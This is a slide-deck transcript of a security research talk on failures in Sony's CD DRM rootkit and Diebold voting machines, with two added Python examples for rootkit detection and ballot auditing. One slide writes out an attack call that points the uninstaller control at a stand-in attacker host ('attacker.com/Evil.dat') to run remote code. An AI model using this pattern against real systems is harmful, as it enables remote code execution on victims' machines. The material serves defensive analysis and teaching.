Lessons from Security Failures In Nontraditional Computing Environments
J. Alex Halderman

Posted on 25-Feb-2016
58 slides

TRANSCRIPT

Page 1: Lessons from Security Failures In Nontraditional Computing Environments

Lessons from Security Failures In Nontraditional Computing Environments

J. Alex Halderman

Page 2

J. Alex Halderman 2

CSS 1999
SDMI 2001
CD DRM 2003, 2005
AACS 2007
Diebold 2003, 2006

What’s the common “thread”?

Page 3

Nontraditional Environments

Problem
Platform
Package

Page 4

Security Intuition Breakdown

Underestimate similarity
Underestimate difference
Underestimate risk

Page 5

Spectacular Failures

Cascading
Irreparable
Collateral damage

Page 6

Nontraditional Environments
Intuition Breakdowns
Spectacular Failures

Page 7

Disaster Investigation

Page 8

Questions

What about these environments makes failures especially severe?
Are there patterns to the design and implementation mistakes behind them?
Where are such failures likely to occur in the future?
What tools and techniques can we use to prevent them?

Page 9

Outline

1. A Model for Security Failures
2. Failures in CD-DRM Systems
3. Failures in E-Voting Systems
4. Predicting Future Disasters
5. Remedies and Defensive Strategies

Page 10

CD DRM

2001 1st generation: Passive protection
2003 2nd generation: Active protection
2005 3rd generation: Weak passive + aggressive active

[H02] [H03] [HF05]

Page 11

Nontraditional Problem

Restrict use (untrusted device)
Compatibility (legacy format)

All DRM: No known solution provides traditional security guarantees

Page 12

Nontraditional Package

(Diagram; labels recovered from the slide:) Hybrid CD: Audio CD, CD marked “Protected”; Autorun; Protection driver; OS; Drivers; Ripper/copier application; Normal CD

Page 13

A Spectacular Failure

Failure in depth: Installer → Patch → Uninstaller
Mass exposure: Millions of computers vulnerable
Difficult repairs: Most users unaware they’re at risk
High costs: Lawsuits, recalls, lost sales

Page 14

SunnComm (“Light years beyond encryption™”): 37 titles, 20 million discs
First4Internet: 52 titles, 4.7 million discs

Page 15

Rootkit [HF06]

DRM challenge: Users will remove protection driver
Vendor response: Install a rootkit to hide it

Magic prefix: $sys$
Hidden: files, processes, registry keys

Page 16

Rootkit (continued) [HF06]

Mistake: Hides arbitrary objects (e.g., $sys$virus.exe)
Attack: Privilege escalation
Exploits in wild: Backdoor.Ryknos.B, Trojan.Welomoch
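The hiding behaviour described on these two slides, and the cross-view check a defender uses to catch it, as an added Python example. This is not code from the slides or from [HF06]: the object names (apart from $sys$virus.exe, which the slide itself uses) and both enumeration "views" are constructed, and the cloaking filter is a stand-in for the real driver's hooked system calls.

```python
"""Cross-view detection of objects cloaked by a magic-name prefix.

Constructed model: RAW_VIEW plays the role of an independent, low-level
enumeration (parsing on-disk structures, kernel lists or hive files
directly); cloaked_api_view() plays the role of the rootkit's hooked
enumeration APIs.  Nothing here touches a real system.
"""

MAGIC_PREFIX = "$sys$"   # the prefix named on the slide

# Constructed raw view.  Names are made up except $sys$virus.exe, the
# slide's example of a third-party object that the cloak also hides.
RAW_VIEW = {
    "files": ["notepad.exe", "$sys$drm.sys", "$sys$virus.exe", "readme.txt"],
    "processes": ["explorer.exe", "$sys$drmsvc.exe", "winlogon.exe"],
    "registry_keys": [r"HKLM\SYSTEM\Services\Tcpip", r"HKLM\SYSTEM\Services\$sys$drm"],
}


def leaf_name(name):
    """Last path component; the cloak tests the prefix on that part."""
    return name.rsplit("\\", 1)[-1]


def would_be_hidden(name):
    """The vendor's rule applied to any object.  Only the prefix is checked,
    so anyone's $sys$virus.exe is cloaked exactly like the DRM driver: this
    is the 'hides arbitrary objects' mistake on the slide."""
    return leaf_name(name).startswith(MAGIC_PREFIX)


def cloaked_api_view(raw):
    """Emulates the hooked enumeration APIs: cloaked objects vanish."""
    return {kind: [n for n in names if not would_be_hidden(n)]
            for kind, names in raw.items()}


def cross_view_diff(raw, api):
    """Cross-view detection: anything the raw enumeration sees that the
    API view does not is being hidden from the user, by someone."""
    return {kind: sorted(set(names) - set(api.get(kind, [])))
            for kind, names in raw.items()}


def find_hidden(raw=RAW_VIEW):
    """Run both views over the constructed system and report only the
    categories in which hidden objects were found."""
    diff = cross_view_diff(raw, cloaked_api_view(raw))
    return {kind: names for kind, names in diff.items() if names}


if __name__ == "__main__":
    for kind, names in find_hidden().items():
        print(f"{kind}: {', '.join(names)}")
```

In practice the two views come from genuinely independent code paths, which is what makes the diff meaningful; here the API view is derived from the raw one only so the example runs offline.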

Page 17

Installer

DRM challenge: Users will decline to install software
Vendor response: Install regardless of consent

13+ MB installed before EULA screen
Runs with administrator privileges next time CD is inserted
Mistake: Incorrect permissions (Everyone: Full Control)
Attack: Privilege escalation

Page 18

Installer (continued)

Sony releases patch… but the patch calls potentially booby-trapped code [HF06]
How do users know they need to patch? Vulnerable even if installation was refused

Page 19

Uninstallers [HF06]

DRM challenge: Angry customers demand removal
Vendor response: Offer uninstallers, but limit access

1. User obtains single-use code for uninstallation web page
2. Web page calls ActiveX control: CodeSupport.Uninstall(“http://www.sony-bmg.com/XCP.dat”)
3. Client (CodeSupport.ocx) sends “HTTP GET /XCP.dat” to server sony-bmg.com, which returns XCP.dat
4. Client extracts InstallLite.dll from XCP.dat, calls UnInstall_xcp()

Page 20

Uninstallers (continued) [HF06]

Attack: Remote code execution
Mistakes (rookie mistakes):
Control accepts arbitrary URL
Remote code not authenticated
Control not removed after use

1. Victim visits attacker’s web page, which calls CodeSupport.Uninstall(“http://www.attacker.com/Evil.dat”)
2. Client sends “HTTP GET /Evil.dat” to server attacker.com, which returns Evil.dat
3. Client executes code from Evil.dat with user’s privileges

Page 21

Environmental Effects

Technology phase change: Risks appear unexpectedly
DRM problem → inherent conflict: Deliberately subvert control of PC
Lack of transparency: Problems more difficult to detect
Conflicting incentives: Choose risky DRM over user security
Politics

Page 22

Intuition Breakdown

Nearly all parties underestimated security risks:

Vendors: Destroyed by rookie security mistakes
Sony: “Most people, I think, don't even know what a Rootkit is, so why should they care about it?” — Thomas Hesse, President, Sony BMG Global Digital Business
Users: Didn’t know music CDs could hurt them
Experts: Didn’t discover rootkit for six months

Page 23

Outline

1. A Model for Security Failures
2. Failures in CD-DRM Systems
3. Failures in E-Voting Systems
4. Predicting Future Disasters
5. Remedies and Defensive Strategies

Page 24

Diebold DREs

Page 25

Nontraditional Package

Page 26

Nontraditional Platform

Page 27

Nontraditional Problem

Paperless DREs: No known solution provides traditional security guarantees

Voting… securely, secretly, accessibly, quickly, cheaply

Page 28

A Spectacular Failure

Failures in depth: Code insertion routes, physical security
Mass exposure: Millions of votes at risk
Difficult repairs: Some attacks not patchable
High costs: Many states likely to replace machines

Page 29

Inserting Code [FHF07]

(Diagram; labels recovered from the slide:)
Bootloader (internal flash or EPROM): FBOOT.NB0
WinCE Kernel (internal flash): NK.BIN
BallotStation (internal flash): INSTALL.INS
EXPLORER.GLB

Page 30

Inserting Code [FHF07]

(Diagram: Bootloader (flash), WinCE Kernel, BallotStation)

Failure in depth: Boot into Explorer; insecure firmware updater; ROM replacement

Page 31

Stealing Votes [FHF07]

(Diagram: WinCE Kernel, BallotStation, Stuffer)

Page 32

Stealing Votes [FHF07]

(Diagram: Kernel, BallotStation, Stuffer; Primary Vote Record, Backup Vote Record and Audit Log shown before and after)

Page 33

Viral Propagation [FHF07]

(Diagram; label: Reboot)

Page 34

[FHF07]

Page 35

Physical Security [FHF07]

Page 36

Physical Security [FHF07]

Failure in depth:
Same key used everywhere
Widely available
Secret disclosed on web site
Lock easy to pick

Page 37

Environmental Effects

Technology phase change: Risks appear unexpectedly
Difficulty of the problem: Confusing threat model, circular reasoning
Lack of transparency: Basic errors persist for years; security treated as a PR problem
Conflicting incentives: Officials choose efficiency over security
Politics

Page 38

Intuition Breakdown

Nearly all parties underestimated security risks:

Vendor: Planned security by obscurity; vastly underinvested in security design
Officials: Many surprised by severity of problems
Experts: Underestimated similarity to PCs; didn’t understand threat model
CAs: Lacked institutional competence to see risks

Page 39

Outline

1. A Model for Security Failures
2. Failures in CD-DRM Systems
3. Failures in E-Voting Systems
4. Predicting Future Disasters
5. Remedies and Defensive Strategies

Page 40

Learning from Failures

My past work: CD DRM; E-voting
Related work: Past voting studies; CSS, SDMI, HDCP, DTV, WEP, GSM, RFID
Work in progress: AACS; other voting systems
Future work: (Predicted failures)

Page 41

AACS [Work in progress]

Key hierarchy: Title Key, Volume Key, Processing Key, Device Key
Timeline: January 12, January 13, February 11, February 24

Potential disaster (analyze game theory)
Solid crypto, rookie coding errors
Revocable arms race
Interesting lessons on incentives, politics, law
DRM as nontraditional security problem

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 bd
09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 be
09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 bf
?
09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c1
09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c2
09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c3

Page 42

Other Voting Systems [Work in progress]

Page 43

Predicting Failures

Nontraditional Environment + Technology Phase Change +

Page 44

Future Failures?

Page 45

Future Failures?

Page 46

Future Failures?

Page 47

Future Failures?

Page 48

Outline

1. A Model for Security Failures
2. Failures in CD-DRM Systems
3. Failures in E-Voting Systems
4. Predicting Future Disasters
5. Remedies and Defensive Strategies

Page 49

Defensive Approach

New intuitions
New technologies
New policies

Page 50

General Lessons

Security disasters occur where security research isn’t involved
  → New intuitions, partnerships, transparency
Problems that resist rigorous security analysis are prone to major failures
  → Research ways to transform problems
Failures have higher externalities where producer and user incentives misalign
  → Where appropriate, add liability

Page 51

Remedies: DRM

New intuition: DRM as a risk to client security
New policies: Mandatory transparency (DMCA reform, installation disclosure); liability for aggressive, dangerous techniques (change maker incentives)

Page 52

Remedies: E-Voting

New intuitions: Voting machines and PCs share vulnerabilities; no software should be trusted to count votes
New policies: Improved transparency, certification processes; liability for insecurity: fix at vendor’s cost? (change maker incentives); software independence

Page 53

New Technologies [CHF07]: Machine-assisted auditing

1. Initial count (untrusted)
2. Recount machine commits to each ballot
3. Humans check sample by hand

Page 54

New Technologies [HW07]: Harvested verifiable challenges

C := H(…)

1. Collect fresh data from varied sources
2. Hash data to form “challenge”
3. Anyone can verify challenge was valid
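The two procedures on these slides (machine-assisted auditing and harvested verifiable challenges) combined in one added Python example, which is not code from [CHF07], from [HW07] or from the slides: the recount machine commits to every ballot interpretation, a challenge is formed by hashing fresh data from varied sources, and that challenge selects the ballots humans check by hand. Using the harvested challenge as the audit's random seed is this example's assumption about how the two fit together; the ballots, the "harvested" feeds and SAMPLE_SIZE are constructed.

```python
"""Commit-to-each-ballot auditing, sampled with a harvested challenge.

Constructed model.  PAPER_BALLOTS is the ground truth on paper; the
machine's interpretation is committed to before the challenge exists, so
the machine cannot choose its answers knowing which ballots will be checked.
"""
import hashlib
import hmac
import secrets

SAMPLE_SIZE = 5   # constructed; real audits size the sample statistically

# Constructed paper ballots: id -> the choice the paper actually records.
PAPER_BALLOTS = {f"B{i:03d}": ("Alice" if i % 3 else "Bob") for i in range(1, 31)}


def machine_interpret(ballot_id, paper_choice, misread=frozenset()):
    """Stand-in for the recount machine's scanner.  `misread` simulates a
    buggy or dishonest machine that flips the listed ballots."""
    if ballot_id in misread:
        return "Bob" if paper_choice == "Alice" else "Alice"
    return paper_choice


def commit(ballot_id, choice):
    """Commit to one interpretation: publish C = H(id | choice | nonce) and
    keep (choice, nonce) as the opening until the audit."""
    nonce = secrets.token_bytes(16)
    digest = hashlib.sha256(f"{ballot_id}|{choice}|".encode() + nonce).hexdigest()
    return digest, (choice, nonce)


def machine_recount(paper, misread=frozenset()):
    """Step 2 of the auditing slide: interpret and commit to every ballot."""
    tally, commitments, openings = {}, {}, {}
    for bid, paper_choice in paper.items():
        choice = machine_interpret(bid, paper_choice, misread)
        tally[choice] = tally.get(choice, 0) + 1
        commitments[bid], openings[bid] = commit(bid, choice)
    return tally, commitments, openings


def harvest_challenge(sources):
    """Steps 1-2 of the challenge slide: hash fresh data from varied sources.
    Each item is length-prefixed so the encoding is unambiguous and anyone
    holding the same published inputs recomputes the same value."""
    h = hashlib.sha256()
    for name, data in sources:
        for part in (name.encode(), data):
            h.update(len(part).to_bytes(4, "big"))
            h.update(part)
    return h.hexdigest()


def verify_challenge(sources, challenge):
    """Step 3 of the challenge slide: anyone can recompute and compare."""
    return hmac.compare_digest(harvest_challenge(sources), challenge)


def select_sample(challenge, ballot_ids, n):
    """Derive n distinct ballot ids from the challenge.  Deterministic, so the
    selection itself can be re-derived by anyone holding the challenge."""
    ids = sorted(ballot_ids)
    n = min(n, len(ids))
    chosen, counter = [], 0
    while len(chosen) < n:
        r = hashlib.sha256(f"{challenge}|{counter}".encode()).digest()
        bid = ids[int.from_bytes(r, "big") % len(ids)]
        if bid not in chosen:
            chosen.append(bid)
        counter += 1
    return chosen


def hand_audit(sample, paper, commitments, openings):
    """Step 3 of the auditing slide: open the sampled commitments and compare
    with the paper.  Returns the discrepancies found."""
    problems = []
    for bid in sample:
        choice, nonce = openings[bid]
        recomputed = hashlib.sha256(f"{bid}|{choice}|".encode() + nonce).hexdigest()
        if not hmac.compare_digest(recomputed, commitments[bid]):
            problems.append((bid, "commitment does not open"))
        elif choice != paper[bid]:
            problems.append((bid, f"machine said {choice}, paper says {paper[bid]}"))
    return problems


def run_audit(sources, misread=frozenset()):
    """End to end: recount with commitments, then harvest the challenge, then
    select and hand-check the sample.  Returns (machine tally, discrepancies)."""
    tally, commitments, openings = machine_recount(PAPER_BALLOTS, misread)
    challenge = harvest_challenge(sources)
    assert verify_challenge(sources, challenge)   # anyone can redo this step
    sample = select_sample(challenge, PAPER_BALLOTS, SAMPLE_SIZE)
    return tally, hand_audit(sample, PAPER_BALLOTS, commitments, openings)


if __name__ == "__main__":
    feeds = [("feed-a", b"constructed data A"), ("feed-b", b"constructed data B")]
    print("honest machine:", run_audit(feeds))
    print("flips everything:", run_audit(feeds, frozenset(PAPER_BALLOTS)))
```

The order matters: commitments are published before the challenge data exists, and the challenge inputs are public, so neither the machine nor the auditors can steer which ballots get checked.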

Page 55

Contributions

1. New model for security failures: Analysis of past failures from the literature; predictions for future failures; policy implications
2. Analysis of failures in DRM systems: Inherent limitations of CD copy protection [H03, H04]; client security failures from Sony CD DRM [HF06]; coming AACS arms race*
3. Analysis of failures in e-voting systems: Diebold AccuVote TS and TSx [FHF07]; AVC Advantage*
4. Technological remedies: Machine-assisted election auditing [CHF07]; harvesting verifiable challenges [HW07]; privacy management for mobile devices [HWF05]

Page 56

References

[H03] J. A. Halderman. “Evaluating New Copy-Prevention Techniques for Audio CDs.” DRM 2002.
[H04] J. A. Halderman. “Analysis of the MediaMax CD3 Copy-Prevention System.” 2003.
[HWF04] J. A. Halderman, B. Waters, and E. Felten. “Privacy Management for Portable Recording Devices.” WPES 2004.
[HF06] J. A. Halderman and E. Felten. “Lessons from the Sony CD DRM Episode.” USENIX Security 2006.
[FHF07] A. Feldman, J. A. Halderman, and E. Felten. “Security Analysis of the Diebold AccuVote-TS Voting Machine.” In submission, 2007.
[CHF07] J. Calandrino, J. A. Halderman, and E. Felten. “Machine-Assisted Election Auditing.” In submission, 2007.
[HW07] J. A. Halderman and B. Waters. “Harvesting Verifiable Challenges from Oblivious Online Sources.” In submission, 2007.

Page 57

Lessons from Security Failures In Nontraditional Computing Environments

J. Alex Halderman

Page 58